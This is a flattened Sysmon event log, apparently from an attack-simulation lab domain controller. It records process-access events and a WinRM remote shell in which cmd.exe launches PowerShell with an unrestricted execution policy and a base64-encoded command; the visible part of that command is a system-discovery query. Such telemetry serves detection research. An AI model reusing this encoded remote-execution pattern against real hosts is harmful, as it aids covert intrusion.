08:40:29.462{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000636Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-167D-5F84-1C03-000000007E01}4952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000635Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-167D-5F84-1A03-000000007E01}49282476C:\Windows\system32\WinrsHost.exe{5D479F2C-167D-5F84-1C03-000000007E01}4952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000634Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.473{5D479F2C-167D-5F84-1C03-000000007E01}4952C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167D-5F84-5024-120000000000}0x1224500HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-167D-5F84-1A03-000000007E01}4928C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000633Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000632Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000631Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000630Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.462{5D479F2C-1507-5F84-1300-000000007E01}13081948C:\Windows\system32\svchost.exe{5D479F2C-167D-5F84-1A03-000000007E01}4928C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000629Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-167D-5F84-1A03-000000007E01}4928C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000628Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.446{5D479F2C-167D-5F84-1B03-000000007E01}46364640C:\Windows\system32\conhost.exe{5D479F2C-167D-5F84-1A03-000000007E01}4928C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000627Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-167D-5F84-1B03-000000007E01}4636C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000626Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000625Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000624Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000623Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000622Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000621Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000620Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000619Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000618Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000617Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-167D-5F84-1A03-000000007E01}4928C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000616Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-167D-5F84-1A03-000000007E01}4928C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000615Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.441{5D479F2C-167D-5F84-1A03-000000007E01}4928C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-167D-5F84-5024-120000000000}0x1224500HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-1506-5F84-0C00-000000007E01}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000614Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000613Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000612Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:29.431{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000696Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 